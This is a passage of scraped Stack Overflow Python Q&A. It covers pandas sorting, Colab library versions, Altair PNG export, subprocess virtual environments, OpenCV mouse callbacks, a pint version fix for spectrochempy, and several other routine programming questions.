print("\nBefore sorting:")
print(csvData)
# sort data frame
csvData.sort_values(["package"],
axis=0,
inplace=True)
# displaying sorted data frame
print("\nAfter sorting:")
print(csvData)
These are the results
Before sorting:
package version labels
0 absl-py 1.2.0 ['util-busybox', 'unknown']
1 aiohttp 3.8.3 ['util-busybox', 'unknown']
2 aiosignal 1.3.1 ['util-busybox', 'unknown']
3 appdirs 1.4.4 ['util-busybox', 'unknown']
4 ascalon-audio-data-utils 0.3.37 ['util-busybox', 'unknown']
After sorting:
package version labels
29 Flask 2.2.2 ['util-busybox', 'unknown']
30 Flask-SQLAlchemy 3.0.2 ['util-busybox', 'unknown']
46 Jinja2 3.1.2 ['util-busybox', 'unknown']
49 Keras-Preprocessing 1.1.2 ['util-busybox', 'unknown']
55 Markdown 3.4.1 ['util-busybox', 'unknown']
I don't understand how it is sorting and why I can't get it to sort alphabetically.
I tried using the sorted as well
# import modules
import csv, operator
# load csv file
data = csv.reader(open('python_packages.csv'), delimiter=',')
# sort data on the basis of age
data = sorted(data, key=operator.itemgetter(0))
# displaying sorted data
print(data)
this is the error I am getting
data = sorted(data, key=operator.itemgetter(0))
IndexError: list index out of range
package is the first column
this is baffling me
A:
Python's default string sorting compares Unicode code points, so uppercase letters always sort before lowercase letters, regardless of the letter. You can use this to sort it properly:
import pandas as pandasForSortingCSV
# assign dataset
csvData = pandasForSortingCSV.read_csv("python_packages.csv")
# displaying unsorted data frame
print("\nBefore sorting:")
print(csvData)
# sort data frame
csvData.sort_values(["package"],
axis=0,
inplace=True, key=lambda col: col.str.lower())
# displaying sorted data frame
print("\nAfter sorting:")
print(csvData)
col.str.lower() converts the name into the lowercase version so the capital letters don't matter.
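As for the IndexError in the csv/operator attempt: that typically happens when csv.reader yields an empty row (for example a trailing blank line), which has no element 0. A minimal sketch that skips empty rows and ignores case (assuming the file layout from the question, with the first row as a header):
import csv

with open('python_packages.csv') as f:
    rows = [row for row in csv.reader(f) if row]  # drop empty rows

header, body = rows[0], rows[1:]  # assuming the first row is a header
body.sort(key=lambda row: row[0].lower())
print(body)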
| I am trying to sort a csv alphabetically but it's not happening | I am trying to sort a csv file alphabetically by the package column. I am using this code
import pandas as pandasForSortingCSV
# assign dataset
csvData = pandasForSortingCSV.read_csv("python_packages.csv")
# displaying unsorted data frame
print("\nBefore sorting:")
print(csvData)
# sort data frame
csvData.sort_values(["package"],
axis=0,
inplace=True)
# displaying sorted data frame
print("\nAfter sorting:")
print(csvData)
These are the results
Before sorting:
package version labels
0 absl-py 1.2.0 ['util-busybox', 'unknown']
1 aiohttp 3.8.3 ['util-busybox', 'unknown']
2 aiosignal 1.3.1 ['util-busybox', 'unknown']
3 appdirs 1.4.4 ['util-busybox', 'unknown']
4 ascalon-audio-data-utils 0.3.37 ['util-busybox', 'unknown']
After sorting:
package version labels
29 Flask 2.2.2 ['util-busybox', 'unknown']
30 Flask-SQLAlchemy 3.0.2 ['util-busybox', 'unknown']
46 Jinja2 3.1.2 ['util-busybox', 'unknown']
49 Keras-Preprocessing 1.1.2 ['util-busybox', 'unknown']
55 Markdown 3.4.1 ['util-busybox', 'unknown']
I don't understand how it is sorting and why I can't get it to sort alphabetically.
I tried using the sorted as well
# import modules
import csv, operator
# load csv file
data = csv.reader(open('python_packages.csv'), delimiter=',')
# sort data on the basis of age
data = sorted(data, key=operator.itemgetter(0))
# displaying sorted data
print(data)
this is the error I am getting
data = sorted(data, key=operator.itemgetter(0))
IndexError: list index out of range
package is the first column
this is baffling me
| [
"The sorting in python is a little weird. Uppercase letters always become first before lower case letters irregardless of the letter. You can use this to sort it properly:\nimport pandas as pandasForSortingCSV\n\n# assign dataset\ncsvData = pandasForSortingCSV.read_csv(\"python_packages.csv\")\n\n# displaying unsorted data frame\nprint(\"\\nBefore sorting:\")\nprint(csvData)\n\n# sort data frame\ncsvData.sort_values([\"package\"],\n axis=0,\n inplace=True, key=lambda col: col.str.lower())\n# displaying sorted data frame\nprint(\"\\nAfter sorting:\")\nprint(csvData)\n\ncol.str.lower() converts the name into the lowercase version so the capital letters don't matter.\n"
] | [
0
] | [] | [] | [
"csv",
"pandas",
"python",
"python_3.x",
"sorting"
] | stackoverflow_0074599953_csv_pandas_python_python_3.x_sorting.txt |
Q:
How to use two different versions of library in google colab?
How to use two different versions of library (for example, sklearn) in google colab?
I created two files in one I install version 0.21.3, and in the other the same version is installed immediately, how to make the versions in different files different?
A:
I don't think you can do this in python without complicated workarounds.
You could run a subprocess in a different python version using virtual environments via pyenv for each script.
I advise against it though. Maybe someone can make a good alternative suggestion if you tell us why you need to have different versions of the same library.
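That said, a minimal sketch of the virtual-environment workaround in Colab could look like this (the environment path, the script name and the version pin are assumptions, not tested values; if venv creation fails you may need !apt-get install python3-venv first):
!python3 -m venv /content/sklearn_021_env
!/content/sklearn_021_env/bin/pip install scikit-learn==0.21.3

import subprocess

# runs the (hypothetical) other_script.py with the venv's interpreter, while
# the notebook itself keeps whatever sklearn version is installed globally
subprocess.run(["/content/sklearn_021_env/bin/python", "other_script.py"], check=True)
Note that this only isolates the library version under the same Python; pyenv, as mentioned above, would additionally let each environment use a different Python version.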
| How to use two different versions of library in google colab? | How to use two different versions of library (for example, sklearn) in google colab?
I created two files in one I install version 0.21.3, and in the other the same version is installed immediately, how to make the versions in different files different?
| [
"I don't think you can do this in python without complicated workarounds.\nYou could run a subprocess in a different python version using virtual environments via pyenv for each script.\nI advise against it though. Maybe someone can make a good alternative suggestion if you tell us why you need to have different versions of the same library.\n"
] | [
0
] | [] | [] | [
"anaconda",
"google_colaboratory",
"python",
"sklearn_pandas"
] | stackoverflow_0074600783_anaconda_google_colaboratory_python_sklearn_pandas.txt |
Q:
Max retries exceeded error when trying to save graph as png
Every time I try to save graphs as png files, I can only save a few times before a Max retries exceeded error appears:
MaxRetryError: HTTPConnectionPool(host='localhost', port=49307): Max retries exceeded with url: /session/90fd658175ea86931fe863c6f0bab370/url (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7f35b033fb10>: Failed to establish a new connection: [Errno 111] Connection refused'))
So I cannot use altair for long, and this happens every time I have more graphs to save. This is a huge problem because I need the graphs saved in an image format for my further pipeline.
I run them on google colab, and this is how I install dependency to save graph as png:
!pip install altair_saver
!pip install selenium==4.2.0
!apt-get install chromium-chromedriver
Right now I have to restart the runtime every time this error occurs, but then all my variables are lost.
Any solution to save pictures as png without encountering this error? Thanks!
A:
There are some issues with the altair_saver methods and the next version of altair will likely use a new library called vl-convert which fixes most saving issues, but until that is released, we have to use it manually. First do python -m pip install vl-convert-python from your environment, then you can try this:
import vl_convert as vlc
def save_chart(chart, filename, scale_factor=1):
'''
Save an Altair chart using vl-convert
Parameters
----------
chart : altair.Chart
Altair chart to save
filename : str
The path to save the chart to
scale_factor: int or float
The factor to scale the image resolution by.
E.g. A value of `2` means two times the default resolution.
'''
with alt.data_transformers.enable("default") and alt.data_transformers.disable_max_rows():
if filename.split('.')[-1] == 'svg':
with open(filename, "w") as f:
f.write(vlc.vegalite_to_svg(chart.to_dict()))
elif filename.split('.')[-1] == 'png':
with open(filename, "wb") as f:
f.write(vlc.vegalite_to_png(chart.to_dict(), scale=scale_factor))
else:
raise ValueError("Only svg and png formats are supported")
If you wanted to use this function to save a chart as a PNG file at 2x the default resolution you would type save_chart(my_chart, 'my-chart.png', 2) as in this example:
import pandas as pd
import altair as alt
source = pd.DataFrame({
'a': ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I'],
'b': [28, 55, 43, 91, 81, 53, 19, 87, 52]
})
my_chart = alt.Chart(source).mark_bar().encode(
x='a',
y='b'
)
save_chart(my_chart, 'my-chart.png', 2)
| Max retries exceeded error when trying to save graph as png | Every time I try to save graphs as png files, I can only save a few times before a Max retries exceeded error appears:
MaxRetryError: HTTPConnectionPool(host='localhost', port=49307): Max retries exceeded with url: /session/90fd658175ea86931fe863c6f0bab370/url (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7f35b033fb10>: Failed to establish a new connection: [Errno 111] Connection refused'))
So I cannot use altair for long, and this happens every time I have more graphs to save. This is a huge problem because I need the graphs saved in an image format for my further pipeline.
I run them on google colab, and this is how I install dependency to save graph as png:
!pip install altair_saver
!pip install selenium==4.2.0
!apt-get install chromium-chromedriver
Right now I have to restart the runtime every time this error occurs, but then all my variables are lost.
Any solution to save pictures as png without encountering this error? Thanks!
| [
"There are some issues with the altair_saver methods and the next version of altair will likely use a new library called vl-convert which fixes most saving issues, but until that is released, we have to use it manually. First do python -m pip install vl-convert-python from your environment, then you can try this:\nimport vl_convert as vlc\n\ndef save_chart(chart, filename, scale_factor=1):\n '''\n Save an Altair chart using vl-convert\n \n Parameters\n ----------\n chart : altair.Chart\n Altair chart to save\n filename : str\n The path to save the chart to\n scale_factor: int or float\n The factor to scale the image resolution by.\n E.g. A value of `2` means two times the default resolution.\n '''\n with alt.data_transformers.enable(\"default\") and alt.data_transformers.disable_max_rows():\n if filename.split('.')[-1] == 'svg':\n with open(filename, \"w\") as f:\n f.write(vlc.vegalite_to_svg(chart.to_dict()))\n elif filename.split('.')[-1] == 'png':\n with open(filename, \"wb\") as f:\n f.write(vlc.vegalite_to_png(chart.to_dict(), scale=scale_factor))\n else:\n raise ValueError(\"Only svg and png formats are supported\")\n\nIf you wanted to use this function to save a chart as a PNG file at 2x the default resolution you would type save_chart(my_chart, 'my-chart.png', 2) as in this example:\nimport pandas as pd\nimport altair as alt\n\n\nsource = pd.DataFrame({\n 'a': ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I'],\n 'b': [28, 55, 43, 91, 81, 53, 19, 87, 52]\n})\nmy_chart = alt.Chart(source).mark_bar().encode(\n x='a',\n y='b'\n)\n\nsave_chart(my_chart, 'my-chart.png', 2)\n\n"
] | [
0
] | [] | [] | [
"altair",
"python"
] | stackoverflow_0074512623_altair_python.txt |
Q:
How to avoid loading wrong libraries when using a subprocess.Popen() from a python script to run a venv?
I want to run a script using a venv python~3.9 from a subprocess call of another application that uses python3.6. However the imported libraries are wrong and from the site-packages of 3.6 version. How can I modify the subprocess call to load the correct libraries i.e from the venv(3.9 version)
p = Popen([process_name, parameters_l], stdin=PIPE, stdout=PIPE, stderr=PIPE)
I have tried using the cwd argument and also changing the working directory via os.chdir; however, that doesn't seem to work. Furthermore, I tried to run activate.bat from the venv, but the issue persists.
A:
You should use an absolute path to that venv like /path/to/venv/bin/python3.9
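Applied to the Popen call from the question, that would look something like this (a sketch; the venv path is an assumption, and on Windows the interpreter lives under the venv's Scripts folder instead, e.g. /path/to/venv/Scripts/python.exe):
# process_name here being the script you want the venv's interpreter to run
p = Popen(["/path/to/venv/bin/python3.9", process_name, parameters_l],
          stdin=PIPE, stdout=PIPE, stderr=PIPE)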
A:
This is my example.
example.py
This code shows which Python version runs it.
import sys
print("version {}".format(sys.version))
traverse_python.py
This code loops over several Python interpreters to show which version runs the code.
You can change process_name to the Python version you want to use.
import time
import subprocess, os
pythoninterpretor = ['/usr/local/bin/python3.10', '/usr/local/bin/python3.11']
for i in pythoninterpretor:
    process_name = i
    parameters = 'example.py'
    p = subprocess.Popen([process_name, parameters])
    time.sleep(10)
My results:
FYI, the result doesn't change even if the script's shebang line names a different Python version.
version 3.10.8 (main, Oct 13 2022, 10:17:43) [Clang 14.0.0 (clang-1400.0.29.102)]
version 3.11.0 (main, Oct 25 2022, 14:13:24) [Clang 14.0.0 (clang-1400.0.29.202)]
In your case,
python_interpretor = '/absolute/path/env/python3.9'
p = Popen([python_interpretor, process_name, parameters_l], stdin=PIPE, stdout=PIPE, stderr=PIPE)
and you need to replace /absolute/path/env/python3.9 with your ideal version's path.
| How to avoid loading wrong libraries when using a subprocess.Popen() from a python script to run a venv? | I want to run a script using a venv python~3.9 from a subprocess call of another application that uses python3.6. However the imported libraries are wrong and from the site-packages of 3.6 version. How can I modify the subprocess call to load the correct libraries i.e from the venv(3.9 version)
p = Popen([process_name, parameters_l], stdin=PIPE, stdout=PIPE, stderr=PIPE)
I have tried using the cwd argument and also changing the working directory via os.chdir; however, that doesn't seem to work. Furthermore, I tried to run activate.bat from the venv, but the issue persists.
| [
"You should use an absolute path to that venv like /path/to/venv/bin/python3.9\n",
"This is my example.\nexample.py\nthis code show python version you run.\nimport sys \nprint(\"version {}\".format(sys.version))\n\ntraverse_python.sh\nthis code traverses various python versions to show what version runs the code.\nyou can change the process_name to the python version you want to use.\nimport time\nimport subprocess, os\n\npythoninterpretor = ['/usr/local/bin/python3.10', '/usr/local/bin/python3.11']\n\nfor i in pythoninterpretor:\n process_name = i\n parameters = 'example.py'\n p = subprocess.Popen([process_name, parameters])\n time.sleep(10)\n\nmy results\nFYI, the result won't change even if you explicitly use another python version in shebang in the script.\nversion 3.10.8 (main, Oct 13 2022, 10:17:43) [Clang 14.0.0 (clang-1400.0.29.102)]\nversion 3.11.0 (main, Oct 25 2022, 14:13:24) [Clang 14.0.0 (clang-1400.0.29.202)]\n\n\nIn your case,\npython_interpretor = '/absolute/path/env/python3.9'\np = Popen([python_interpretor, process_name, parameters_l], stdin=PIPE, stdout=PIPE, stderr=PIPE)\n\nand you need to replace /absolute/path/env/python3.9 with your ideal version's path.\n"
] | [
0,
0
] | [] | [] | [
"loadlibrary",
"python",
"subprocess"
] | stackoverflow_0074600714_loadlibrary_python_subprocess.txt |
Q:
How to make a python application that detects a color and when detected presses a button on the keyboard?
I am trying to write an application that constantly checks for a color and when detected, presses the e button once.
import pyautogui
import time
color = (1, 72, 132)
def clicker():
while True:
x, y = pyautogui.position()
pixelColor = pyautogui.screenshot().getpixel((x, y))
if pixelColor == color:
pyautogui.press('e')
def main():
while True:
clicker()
main()
I only got this but it does not work at all.
A:
To get a tuple of RGB colors at the current mouse position I use this
pixel = pyautogui.pixel(*pyautogui.position())
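Put together with the original loop, a minimal sketch (untested; colour value taken from the question) could be:
import time
import pyautogui

color = (1, 72, 132)

def clicker():
    while True:
        # RGB tuple of the pixel currently under the mouse cursor
        if pyautogui.pixel(*pyautogui.position()) == color:
            pyautogui.press('e')
        time.sleep(0.05)  # avoid hammering the CPU with screenshots

clicker()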
| How to make a python application that detects a color and when detected presses a button on the keyboard? | I am trying to write an application that constantly checks for a color and when detected, presses the e button once.
import pyautogui
import time
color = (1, 72, 132)
def clicker():
while True:
x, y = pyautogui.position()
pixelColor = pyautogui.screenshot().getpixel((x, y))
if pixelColor == color:
pyautogui.press('e')
def main():
while True:
clicker()
main()
I only got this but it does not work at all.
| [
"To get a tuple of RGB colors at the current mouse position I use this\npixel = pyautogui.pixel(*pyautogui.position())\n\n"
] | [
0
] | [] | [] | [
"action",
"detection",
"python"
] | stackoverflow_0074602233_action_detection_python.txt |
Q:
Spectrochempy Unable to Find "pint.unit" -- Module Not Found Error
I am trying to install spectrochempy (https://www.spectrochempy.fr/stable/gettingstarted/install/install_win.html) via conda on Windows 10. I am able to follow the instructions without an error message; it is only when trying to verify the installation that I get an error message. The full text of the error message is attached below.
Question: How do I make sure the missing packages are installed and which steps can I take to ensure a smooth installation?
Full error message:
from spectrochempy import *
---------------------------------------------------------------------------
ModuleNotFoundError Traceback (most recent call last)
<ipython-input-1-eda726baf6bc> in <cell line: 1>()
----> 1 from spectrochempy import *
~\anaconda3\lib\site-packages\spectrochempy\__init__.py in <module>
57 # import the main api
58
---> 59 from spectrochempy import api
60 from spectrochempy.api import * # noqa: F401
61
~\anaconda3\lib\site-packages\spectrochempy\api.py in <module>
86 # ------------------------------------------------------------------
87 # import the core api
---> 88 from . import core
89 from .core import * # noqa: F403, F401, E402
90
~\anaconda3\lib\site-packages\spectrochempy\core\__init__.py in <module>
29 # ======================================================================================================================
30
---> 31 from ..utils import pstr # noqa: E402
32 import logging
33 import inspect
~\anaconda3\lib\site-packages\spectrochempy\utils\__init__.py in <module>
28 from .print import *
29 from .file import *
---> 30 from .jsonutils import *
31 from .misc import *
32 from .packages import *
~\anaconda3\lib\site-packages\spectrochempy\utils\jsonutils.py in <module>
18 import numpy as np
19
---> 20 from spectrochempy.core.units import Quantity, Unit
21
22 __all__ = ["json_serialiser", "json_decoder"]
~\anaconda3\lib\site-packages\spectrochempy\core\units\__init__.py in <module>
10 """
11
---> 12 from .units import * # noqa: F403, F401, E402
~\anaconda3\lib\site-packages\spectrochempy\core\units\units.py in <module>
30
31
---> 32 from pint.unit import UnitsContainer, Unit, UnitDefinition
33 from pint.quantity import Quantity
34 from pint.formatting import siunitx_format_unit
ModuleNotFoundError: No module named 'pint.unit'
What I've tried:
0. "restart PC"
1. "conda update conda"
C:\WINDOWS\system32>conda update conda
Collecting package metadata (current_repodata.json): done
Solving environment: done
#All requested packages already installed.
Retrieving notices: ...working... done
2. "conda install pint" / "conda update pint"
C:\WINDOWS\system32>conda install pint
Collecting package metadata (current_repodata.json): done
Solving environment: done
#All requested packages already installed.
Retrieving notices: ...working... done
Note: I can run "In [1]: from pint import *" without a problem but "In [2]: from spectrochempy import *" will still claim "ModuleNotFoundError: No module named 'pint.unit'"
3. Re-install Python
I've uninstalled each instance of python I could find in "add or remove programs", then, I deleted "C:\Users\USERNAME\AppData\Local\Programs\Python"; lastly, I removed python from my PATH. After all of that, I installed a fresh python 3.9.13 using Anaconda.
A:
For Future Reference: The solution was to downgrade pint 0.20 -> 0.19
This has turned out to be a bug in the spectrochempy code. There is a thread on github (https://github.com/spectrochempy/spectrochempy/issues/490) which alleges this issue is already solved, however, this was still an issue for me. I used pip to do this which may not have been best practice but worked for me in this case:
pip uninstall pint
pip install pint==0.19.2
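If you prefer to keep everything inside conda instead of mixing in pip, pinning the version there should also work (note that conda uses a single = for version pins):
conda install pint=0.19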
| Spectrochempy Unable to Find "pint.unit" -- Module Not Found Error | I am trying to install spectrochempy (https://www.spectrochempy.fr/stable/gettingstarted/install/install_win.html) via conda on Windows 10. I am able to follow the instructions without an error message; it is only when trying to verify the installation that I get an error message. The full text of the error message is attached below.
Question: How do I make sure the missing packages are installed and which steps can I take to ensure a smooth installation?
Full error message:
from spectrochempy import *
---------------------------------------------------------------------------
ModuleNotFoundError Traceback (most recent call last)
<ipython-input-1-eda726baf6bc> in <cell line: 1>()
----> 1 from spectrochempy import *
~\anaconda3\lib\site-packages\spectrochempy\__init__.py in <module>
57 # import the main api
58
---> 59 from spectrochempy import api
60 from spectrochempy.api import * # noqa: F401
61
~\anaconda3\lib\site-packages\spectrochempy\api.py in <module>
86 # ------------------------------------------------------------------
87 # import the core api
---> 88 from . import core
89 from .core import * # noqa: F403, F401, E402
90
~\anaconda3\lib\site-packages\spectrochempy\core\__init__.py in <module>
29 # ======================================================================================================================
30
---> 31 from ..utils import pstr # noqa: E402
32 import logging
33 import inspect
~\anaconda3\lib\site-packages\spectrochempy\utils\__init__.py in <module>
28 from .print import *
29 from .file import *
---> 30 from .jsonutils import *
31 from .misc import *
32 from .packages import *
~\anaconda3\lib\site-packages\spectrochempy\utils\jsonutils.py in <module>
18 import numpy as np
19
---> 20 from spectrochempy.core.units import Quantity, Unit
21
22 __all__ = ["json_serialiser", "json_decoder"]
~\anaconda3\lib\site-packages\spectrochempy\core\units\__init__.py in <module>
10 """
11
---> 12 from .units import * # noqa: F403, F401, E402
~\anaconda3\lib\site-packages\spectrochempy\core\units\units.py in <module>
30
31
---> 32 from pint.unit import UnitsContainer, Unit, UnitDefinition
33 from pint.quantity import Quantity
34 from pint.formatting import siunitx_format_unit
ModuleNotFoundError: No module named 'pint.unit'
What I've tried:
0. "restart PC"
1. "conda update conda"
C:\WINDOWS\system32>conda update conda
Collecting package metadata (current_repodata.json): done
Solving environment: done
#All requested packages already installed.
Retrieving notices: ...working... done
2. "conda install pint" / "conda update pint"
C:\WINDOWS\system32>conda install pint
Collecting package metadata (current_repodata.json): done
Solving environment: done
#All requested packages already installed.
Retrieving notices: ...working... done
Note: I can run "In [1]: from pint import *" without a problem but "In [2]: from spectrochempy import *" will still claim "ModuleNotFoundError: No module named 'pint.unit'"
3. Re-install Python
I've uninstalled each instance of python I could find in "add or remove programs", then, I deleted "C:\Users\USERNAME\AppData\Local\Programs\Python"; lastly, I removed python from my PATH. After all of that, I installed a fresh python 3.9.13 using Anaconda.
| [
"For Future Reference: The solution was to downgrade pint 0.20 -> 0.19\nThis has turned out to be a bug in the spectrochempy code. There is a thread on github (https://github.com/spectrochempy/spectrochempy/issues/490) which alleges this issue is already solved, however, this was still an issue for me. I used pip to do this which may not have been best practice but worked for me in this case:\npip uninstall pint\n\npip install pint=0.19.2 \n\n"
] | [
0
] | [] | [] | [
"pint",
"python"
] | stackoverflow_0074466054_pint_python.txt |
Q:
Better way to generate Postgresql covered index with SQLAlchemy and Alembic
Since Postgresql 11 covered index have been introduced. We create a covered index using INCLUDE keyword like this:
CREATE INDEX index_name ON table_name(indexed_col_name) INCLUDE (covered_col_name);
Here the official postgresql doc for more details.
I have done some research on Google but did not find how to implement this feature with SQLAlchemy and include it in the migration file generated by Alembic. Any proposition, idea, doc link will be appreciated.
A:
Index("my_index", table.c.x, postgresql_include=['y'])
It's in the postgres-specific part of the documentation
See also: issue, commit
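In an Alembic migration the same keyword argument is passed through op.create_index; a sketch with the placeholder names from the question:
from alembic import op


def upgrade():
    op.create_index(
        "index_name",
        "table_name",
        ["indexed_col_name"],
        postgresql_include=["covered_col_name"],  # emits INCLUDE (covered_col_name)
    )


def downgrade():
    op.drop_index("index_name", table_name="table_name")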
| Better way to generate Postgresql covered index with SQLAlchemy and Alembic | Since Postgresql 11 covered index have been introduced. We create a covered index using INCLUDE keyword like this:
CREATE INDEX index_name ON table_name(indexed_col_name) INCLUDE (covered_col_name);
Here the official postgresql doc for more details.
I have done some research on Google but did not find how to implement this feature with SQLAlchemy and include it in the migration file generated by Alembic. Any proposition, idea, doc link will be appreciated.
| [
"Index(\"my_index\", table.c.x, postgresql_include=['y'])\n\nIt's in the postgres-specific part of the documentation\nSee also: issue, commit\n"
] | [
0
] | [] | [] | [
"alembic",
"postgresql",
"python",
"sqlalchemy"
] | stackoverflow_0073546270_alembic_postgresql_python_sqlalchemy.txt |
Q:
opencv mouse callback isn't being triggered
Take a look at this function:
def showImage(im):
def printColor(event, x, y, flag, params):
if event == cv2.EVENT_LBUTTONDOWN:
print(im[x,y])
sys.exit(1)
tag = "image"
cv2.setMouseCallback(tag, printColor)
cv2.imshow(tag, im)
while True:
if 'q' == chr(cv2.waitKey() & 255):
cv2.destroyAllWindows()
break
It's supposed to display an image and print the pixel at mouse position when clicked. But for some reason the callback isn't being triggered. How can I get this code working?
A:
For setMouseCallback to work you will need to create window object first.
This can be done either by calling imshow before setting mouse callback, or by creating it with cv2.namedWindow()
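Applied to the function from the question, a minimal sketch of that fix (also switching the pixel lookup to im[y, x], since numpy images are indexed row-first):
import cv2

def showImage(im):
    def printColor(event, x, y, flag, params):
        if event == cv2.EVENT_LBUTTONDOWN:
            print(im[y, x])

    tag = "image"
    cv2.namedWindow(tag)                   # create the window first...
    cv2.setMouseCallback(tag, printColor)  # ...so the callback has something to attach to
    cv2.imshow(tag, im)
    while True:
        if 'q' == chr(cv2.waitKey() & 255):
            cv2.destroyAllWindows()
            break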
A:
You may try the following code:
import cv2

def function1(event, x, y, flags, param):
    if event == cv2.EVENT_LBUTTONDOWN:
        # numpy images are indexed [row, col], i.e. [y, x]
        print(input_img[y, x])

input_img = cv2.imread(r'D:\personal data\316817146_6028126817205901_1035125390140549057_n.jpg')  # get image
# named window
cv2.namedWindow('new window')
# show the image in the window
cv2.imshow('new window', input_img)

# call setMouseCallback()
cv2.setMouseCallback('new window', function1)

while True:
    # waitKey returns -1 when no key is pressed; mask to compare with 'q'
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break

cv2.destroyAllWindows()
| opencv mouse callback isn't being triggered | Take a look at this function:
def showImage(im):
def printColor(event, x, y, flag, params):
if event == cv2.EVENT_LBUTTONDOWN:
print(im[x,y])
sys.exit(1)
tag = "image"
cv2.setMouseCallback(tag, printColor)
cv2.imshow(tag, im)
while True:
if 'q' == chr(cv2.waitKey() & 255):
cv2.destroyAllWindows()
break
It's supposed to display an image and print the pixel at mouse position when clicked. But for some reason the callback isn't being triggered. How can I get this code working?
| [
"For setMouseCallback to work you will need to create window object first.\nThis can be done either by calling imshow before setting mouse callback, or by creating it with cv2.namedWindow()\n",
"@You may try the following code\nimport cv2\n\ndef function1(event, x, y, flags, param):\n\n if event==cv2.EVENT_LBUTTONDOWN:\n\n\n print(input_img[x, y])\n\n\ninput_img = cv2.imread(r'D:\\personal \ndata\\316817146_6028126817205901_1035125390140549057_n.jpg') # get image\n#named window\ncv2.namedWindow('new window')\n#show the image in the window\ncv2.imshow('new window', input_img)\n\n#call setMouseCallback()\ncv2.setMouseCallback('new window', function1)\n\nwhile True:\n\n if cv2.waitKey(1) and 0xFF==ord('q'):\n\n break\n\n\ncv2.detroyAllWindows()\n\n"
] | [
3,
0
] | [] | [] | [
"callback",
"cv2",
"opencv",
"python"
] | stackoverflow_0052946499_callback_cv2_opencv_python.txt |
Q:
What is the meaning of [:, 1:] after np.genfromtxt()?
I am struggling with python now. I'm trying this script.
I am sure this is a very common syntax in python, but it is so generic I can't find any explanation that makes sense to me.
Can you help me to understand the meaning of [:, 0] and [:, 1:] in the following lines of code?
syms = np.genfromtxt('people.csv', dtype=str, delimiter=',')[:, 0]
X = np.genfromtxt('people.csv', dtype=object, delimiter=',')[:, 1:]
people.csv
Marc,.2,-2,A
Martine,-.2,0,A
Max,.2,.2,A
Maxine,.2,.1,A
A:
That's using slice notation to extract specific rows and columns from the dataset.
[:, 0] means all rows, column 0.
[:, 1:] means all rows, columns 1 through n (all columns except 0).
See Understanding slicing for a good explanation of Python slicing notation.
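A quick self-contained demo of the same notation on a small array:
import numpy as np

a = np.arange(12).reshape(4, 3)
print(a[:, 0])   # first column of every row -> [0 3 6 9]
print(a[:, 1:])  # every row, columns 1 onward -> a 4x2 sub-array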
| What is the meaning of [:, 1:] after np.genfromtxt()? | I am struggling with python now. I'm trying this script.
I am sure this is a very common syntax in python, but it is so generic I can't find any explanation that makes sense to me.
Can you help me to understand the meaning of [:, 0] and [:, 1:] in the following lines of code?
syms = np.genfromtxt('people.csv', dtype=str, delimiter=',')[:, 0]
X = np.genfromtxt('people.csv', dtype=object, delimiter=',')[:, 1:]
people.csv
Marc,.2,-2,A
Martine,-.2,0,A
Max,.2,.2,A
Maxine,.2,.1,A
| [
"That's using slice notation to extract specific rows and columns from the dataset.\n[:, 0] means all rows, column 0.\n[:, 1:] means all rows, columns 1 through n (all columns except 0).\nSee Understanding slicing for a good explanation of Python slicing notation.\n"
] | [
1
] | [] | [] | [
"numpy",
"python",
"square_bracket"
] | stackoverflow_0074602285_numpy_python_square_bracket.txt |
Q:
Python: Share a python object instance between child processes
I want to share a python class instance between my child processes that are created with the subprocess.Popen
How can I do it ? What arguments should I use of the Popen?
A:
You can share a pickle over a named pipe.
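A minimal sketch of that idea, here using the child's stdin pipe (a named pipe created with os.mkfifo works the same way); the file names and the payload are only illustrative:
# parent.py
import pickle
import subprocess
import sys

payload = {"config": [1, 2, 3]}  # any picklable instance
child = subprocess.Popen([sys.executable, "child.py"], stdin=subprocess.PIPE)
child.stdin.write(pickle.dumps(payload))
child.stdin.close()
child.wait()

# child.py
import pickle
import sys

obj = pickle.load(sys.stdin.buffer)
print("child received:", obj)
Note that this hands each child its own copy of the object, not a shared live instance; mutations in the child are not visible to the parent. For genuinely shared state you would need something like multiprocessing.Manager or shared memory.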
| Python: Share a python object instance between child processes | I want to share a python class instance between my child processes that are created with the subprocess.Popen
How can I do it ? What arguments should I use of the Popen?
| [
"You can share a pickle over a named pipe.\n"
] | [
0
] | [] | [] | [
"multiprocessing",
"process",
"python",
"subprocess"
] | stackoverflow_0074602221_multiprocessing_process_python_subprocess.txt |
Q:
Draw a line that goes outside the image
I need to draw a line that start from a coordinate in the image and if it goes outside the image it will keep drawing starting from the opposite side like the videogame "Snake".
I don't know how to perform this with Python without using libraries.
Example:
after opening an image
I create a for loop taking the commands where to go
if x==(commands value)
x+=1
image[y][x] == (100,100,100)
(100,100,100) is the color
but I don't know how to tell Python to go back to the opposite side when the line goes out of range. For example, if the picture is 100 pixels wide and I start from x position 90, after 10 pixels the line will be at the edge of the picture, and if the for loop keeps going it will raise an 'index out of range' error. I want to give my function the option to go back to x position 0 when it arrives at x position 101.
thanks
A:
Change it to:
image[y % image_height ][x % image_width] = (100, 100, 100)
Modulo operator : https://realpython.com/python-modulo-operator/
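For example, a minimal sketch of the drawing loop with that change (assuming image is a list of rows of RGB tuples):
image_height = len(image)
image_width = len(image[0])

x, y = 90, 10        # starting position
for _ in range(30):  # walk 30 pixels to the right
    x += 1
    # x == 100 wraps back to column 0 instead of raising an IndexError
    image[y % image_height][x % image_width] = (100, 100, 100)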
| Draw a line that goes outside the image | I need to draw a line that start from a coordinate in the image and if it goes outside the image it will keep drawing starting from the opposite side like the videogame "Snake".
I don't know how to perform this with Python without using libraries.
Example:
after opening an image
I create a for loop taking the commands where to go
if x==(commands value)
x+=1
image[y][x] == (100,100,100)
(100,100,100) is the color
but I don't know how to tell Python to go back to the opposite side when the line goes out of range. For example, if the picture is 100 pixels wide and I start from x position 90, after 10 pixels the line will be at the edge of the picture, and if the for loop keeps going it will raise an 'index out of range' error. I want to give my function the option to go back to x position 0 when it arrives at x position 101.
thanks
| [
"Change it to:\nimage[y % image_height ][x % image_width] = (100, 100, 100)\nModulo operator : https://realpython.com/python-modulo-operator/\n"
] | [
1
] | [] | [] | [
"python"
] | stackoverflow_0074602458_python.txt |
Q:
how to install pip install python-telegram-bot?
How do I run pip install python-telegram-bot in PyCharm? Please help me, I get this error msg -
